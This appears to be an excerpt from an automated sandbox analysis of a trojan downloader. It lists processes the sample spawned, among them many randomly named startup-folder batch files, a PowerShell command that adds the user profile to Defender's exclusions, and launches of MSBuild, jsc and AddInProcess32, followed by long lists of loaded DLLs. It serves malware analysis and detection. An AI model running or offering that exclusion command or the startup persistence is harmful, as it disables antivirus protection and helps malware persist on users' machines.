          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATW4YMuey528R5HSnE54AwE5.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3KsdkaRiL7RacJah2YobpSxj.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u0RvkxN9wEthGCCLh4tn7zqU.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4KsgxmPNACDuZ2zjqQjtltvX.bat" "
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3njSfWDGOVl28Hs8hyJ6Y7LT.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9O41Qow2bZeAiNaUuBCU9sI8.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FLz6tWFKVQbppt2Sn3SWxNu4.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8NYZUwJycflpNiJIlSTOBho.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aPLL8m8adxhtzUUH2fMBYP78.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdci9HHJSUc0QT0L7qkU4ePj.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nGizfduNOl4JVOkYHOr4NIAN.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NtFoY6Vi2WtE4qAcwOzUXMHK.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C8TVyoaND4r7GWzWKeeVLeMP.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fKQUct9QxCcX5qlUcu38pRMl.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBNY7HBfHixtkjGDaljf7VCr.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jl2Nqcc7XWeOOYztXFcYbkmD.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OK2XFEh3D7xuLDF5l083mPKW.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p04DXHk7aV49bHDBuFA6B2XV.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfileJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: icu.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
